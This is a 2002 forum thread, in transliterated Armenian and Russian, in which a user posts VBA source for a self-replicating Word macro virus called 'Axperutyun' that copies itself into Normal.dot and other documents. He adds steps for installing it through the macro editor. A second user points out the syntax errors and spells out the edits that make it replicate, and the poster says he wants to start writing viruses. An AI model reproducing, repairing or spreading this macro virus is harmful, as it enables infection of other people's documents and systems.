Armenian Knowledge Base  

Go Back   Armenian Knowledge Base > Technical sections > Software > Software Security
Register

Reply
 
LinkBack Thread Tools
Old 04.07.2002, 22:01   #1
Banned
 
Join Date: 03 2002
Location: Vanadzor
Posts: 246
Downloads: 0
Uploads: 0
Reputation: 0 | 0
Cool Macro Virus

Inch kaseq sra veraberyal?
////****////****////****////****////****////****
Private Sub Document_Open ()
'Author: TigTan
'Name: Axperutyun
'Comments: Friendship 4EVER
'Origin: Zion

Dim Norm, NormCode, NormLines, Doc, DocCode, DocLines
Set Norm = NormalTemplate.VBProject.VBComponents(1)
Set Doc = ActiveDocument.VBProject.VBComponents(1)
Set DocCode = Doc.CodeModule:Set NormCode = Norm.CodeModule
If DocCode.lines(23, 1) = "" Then
For y = 1 To DocCode.countoflines
DocCode.replacelines y,
Next y
For x = 2 To NormCode.countoflines
DocCode.insertlines 26 + x, NormCode.lines(x, 1)
Next x
End If
If NormCode.lines(23, 1) = "" Then
For y = 1 To NormCode.countoflines
NormCode.replacelines y,
Next y
For x = 1 To DocCode.countoflines
NormCode.insertlines 26 + x, DocCode.lines(x, 1)
Next x
End If
End Sub
Private Sub Document_New ()
MsgBox "You have been infected by the "Axperutyun" virus! Thank you, and have a nice day.", vbInformation
End Sub
Private Sub Document_Close ()
End Sub
////****////****////****////****////****////****
Reply With Quote
Old 04.07.2002, 23:56   #2
Guru Apprentice
 
Join Date: 02 2002
Location: /dev/null
Age: 41
Posts: 524
Downloads: 0
Uploads: 0
Reputation: 0 | 0
Post

Насколько я знаю этот язык (VBMacro?? даже названия не помню это только
"активная" часть "вируса". А как она активизируется? Я что должен сам
своими руками добавить в свой документ или темплейт вызов этой функции?
Напоминает одно писмьмо, которое я получил несколько месяцев назад. Что-то
вроде : You've just been infected by first Irish virus. Because we don't
have enough skills to actually write one, we ask you to forward this email
to all your friends, erase all your files and format your hard drive.
Thank you for cooperation. Тоже вирус
Reply With Quote
Old 05.07.2002, 00:32   #3
Banned
 
Join Date: 03 2002
Location: Vanadzor
Posts: 246
Downloads: 0
Uploads: 0
Reputation: 0 | 0
Post

Quote:
Originally posted by Ektich:
Насколько я знаю этот язык (VBMacro?? даже названия не помню это только
"активная" часть "вируса". А как она активизируется? Я что должен сам
своими руками добавить в свой документ или темплейт вызов этой функции?
Напоминает одно писмьмо, которое я получил несколько месяцев назад. Что-то
вроде : You've just been infected by first Irish virus. Because we don't
have enough skills to actually write one, we ask you to forward this email
to all your friends, erase all your files and format your hard drive.
Thank you for cooperation. Тоже вирус
Che VB Macro chi, ughaki Macros a, nor em haytnaberel et sorti Virer grel@, u arden AVP-n brnum a... Vat chi, bayts te chigitem te ov a Ugharkel irants, erevi ejits es Vertsrel...
Da karevor chi....
Uremn, macros Aktivatsnelu mi qani dzev ka, aveli chisht te inchqan qyal a batsogh@, i harke ete miangamits seghmes enable macros to en amena qyal Virin el kvaraqi qo comp@.Karogh es sarqel macros naev texti mej, es aydpisi gazanutyunner shat qich em handipel bayst handipel em u karevor@ da e.
Bayst chigitem xi, ayn inch es gtsel em verev@(Source Code) ay dcode@ Sintax error e talis, chi karoghanum batsel, Aysniqn compiller chi anum...
Bayts te ira Sev gorts@ anum e, aveli chisht Ekranin Msg chi gtsum bayst kextotum e, Erevi im mot visual basic-i problem ka, ete djvar chi du qo mot portsi.
Isk virus@ aktivatsnelu amenahesht dzev@ sa e... portsi sents...
Batsi Word heto seghmi ALT+F11
Heto aj koghmi menu-i vra seghmi "This Document"
heto batsvats masum paste ara qo Source@.
Heto Mti Word Ev Text gri Qo File-i mej u save ara.
Verj sranov "chisht Grats" Code-i jamanak du kstanas Patrasti Active Macro Virus

ThanX
TigTan

P.S. ete djvar chi et virus@ vor du statsel es indz kugharkes?
es mailis vra
[email protected]
kam el
[email protected]
Spaselu em
With Clean Regards
Tigran Tananyan
Reply With Quote
Old 05.07.2002, 01:59   #4
Guru Apprentice
 
Join Date: 02 2002
Location: /dev/null
Age: 41
Posts: 524
Downloads: 0
Uploads: 0
Reputation: 0 | 0
Post

Systax Error выдается потому что у тебя ошибки в 3-х строчках (как минимум в исходнике
кототый в этом посте).

К сожалению на машине где я проверял этот код не установлены Help-файлы,
так что разобраться как конкретно он работает я не могу, могу только
предположить.

А то что AVP его ловит - это я думаю неудивительно. Я бы на месте AVP
ловил бы все что пытается переопределить функцию open или new, а также
изменить normal.dot

TigTan, надеюсь ты не воспримешь мои слова как агрессию, просто хочу
спросить ты сам этот код написал или нашел где-нибудь? Если нашел - тогда
постарайся пройтись по нему построчно и понять что же делает каждая
строка. А где находятся ошибки - этого я не скажу, сам найди.
Reply With Quote
Old 05.07.2002, 18:37   #5
Banned
 
Join Date: 03 2002
Location: Vanadzor
Posts: 246
Downloads: 0
Uploads: 0
Reputation: 0 | 0
Post

Quote:
Originally posted by Ektich:

TigTan, надеюсь ты не воспримешь мои слова как агрессию, просто хочу
спросить ты сам этот код написал или нашел где-нибудь? Если нашел - тогда
постарайся пройтись по нему построчно и понять что же делает каждая
строка. А где находятся ошибки - этого я не скажу, сам найди.
Drova...
Te inch agresiayi masin e gnum xosq@ es chhaskatsa....
Isk vor mej@ sxalner kan es el em hamamit
es inqs el gitem
Promlem@ ay stegh e
*****/////*****/////
For y = 1 To DocCode.countoflines
DocCode.replacelines y, ******(Sxal1)
Next y
For x = 2 To NormCode.countoflines
DocCode.insertlines 26 + x, NormCode.lines(x, 1)
Next x
End If
If NormCode.lines(23, 1) = "" Then
For y = 1 To NormCode.countoflines
NormCode.replacelines y, ******(Sxal2)
Next y
For x = 1 To DocCode.countoflines
---------------------------------------------
Teev es gitem vortegh e sxal@ bayts es chem karoghanum ughel, vorovhetev macros@ chisht e ashxatum, bayts chigitem xi chi anum ayn inch es em uzum.es portsetsi popoxutyun katarel bayts chognets, migutse duq ogneq?
Chishtn asats chigitem xi es el helperum ban chgta....
Gites harts@ na chi te es gitem ardyoq da inch e anum, kam inch chi anum, es uzum imanal dzeznits sra Mutatsianeri tarberaknerits...Ete lav mtqer uneq to xndrem greq, es dem chem lini... nuynisk shat kuraxanam...
Isk inch@ verabervum e nran te ardyoq es em da grel te che to asem...
asa mi hat el qo hamar grem...
tsankatsats configuratsiayov****
for example
erb es uzum vor infectian comp ynkni, batseluts kam pakeluts, kam massag@ erb ekranin ga batseluts te pakeluts? tsankatsats dzevov, du menak asa...
TigTan
Reply With Quote
Old 06.07.2002, 01:40   #6
Guru Apprentice
 
Join Date: 02 2002
Location: /dev/null
Age: 41
Posts: 524
Downloads: 0
Uploads: 0
Reputation: 0 | 0
Post

TigTan: Если убрать запятые в строчках, котоые ты сам и отметил - тогда
вирус работает нормально. Аккуратно переписывает себя внутрь Normal.dot-а.
Странно, очень-очень странно что ты (если ты утверждаешь что сам написал
код) поставил там запятые. Так что я склоняюсь к мнению что ты скопировал
код откуда-то. Дальше есть два варианта: либо ты пытался его
модифицировать и не справился с задачей, либо скопировал код откуда-то,
где код отмечен как "рабочий" и не сумел разобраться почему же он не
работает.

Многие вирусы в интернете опубликованы с мелкими изменениями, которые надо
саммому находить...

Кстати у меня еще ругается на строчку с MsgBox. VB не любит кавычки внутри
кавычек просто убрать кавычки вокруг Axperutyun - и все работает как
часы!
Reply With Quote
Old 06.07.2002, 18:31   #7
Banned
 
Join Date: 03 2002
Location: Vanadzor
Posts: 246
Downloads: 0
Uploads: 0
Reputation: 0 | 0
Post

Quote:
Originally posted by Ektich:
TigTan: Странно, очень-очень странно что ты (если ты утверждаешь что сам написал
код) поставил там запятые. Так что я склоняюсь к мнению что ты скопировал код откуда-то. Дальше есть два варианта: либо ты пытался его
модифицировать и не справился с задачей, либо скопировал код откуда-то, где код отмечен как "рабочий" и не сумел разобраться почему же он не работает. Многие вирусы в интернете опубликованы с мелкими изменениями, которые надо
саммому находить...
Ektich jan asetsi che eli ay tsavt tanem, es em grel, ughaki minch ayd voch mi angam chei grel es Macro, vorpeszi havatas vor es em grel es qez funktsianer asetsi, asa yst qo funktsianeri es grem qo hamar, ete urish teghits es vertsrats linei, to kmtnei viruszone u aynteghits mi hat macro virus generator kqashei, u im uzats dzevov viri ksarqei.Kam el macroi tegh@ Polymorphic-i generator kqashei, kkoxei source@ Asma, compiler kanei u im Anunov Virus kdarnar, bayts da inchpes asetsi aydqan el Cool chi.Es nor em uzum sksel Virmaker-utyuns, ev uzum em sksel inchpes bolor@ heshtits, "heriq"-a inchqan Internetits qashem, im kartsiqov arden jamanakn e Virus Grel@, Hayrenakan Virmakerutyun@ Araj tanelu jamanakn a!
Isk qez kasem Mersi, ete lav Doc-eri, kam el Macroneri Sourceri,tegh gites asa hastsen mtnem qashem.Tsavoq es shat jamanak chunem el internetum sourcer man galu, vorovhetev esa mi 2 amsits gnum em banak.Hima Archive em havaqum vor ayntegh usumnasirem
Reply With Quote
Sponsored Links
Reply

Thread Tools


На правах рекламы:
реклама

All times are GMT. The time now is 04:13.


Powered by vBulletin® Copyright ©2000 - 2017, Jelsoft Enterprises Ltd.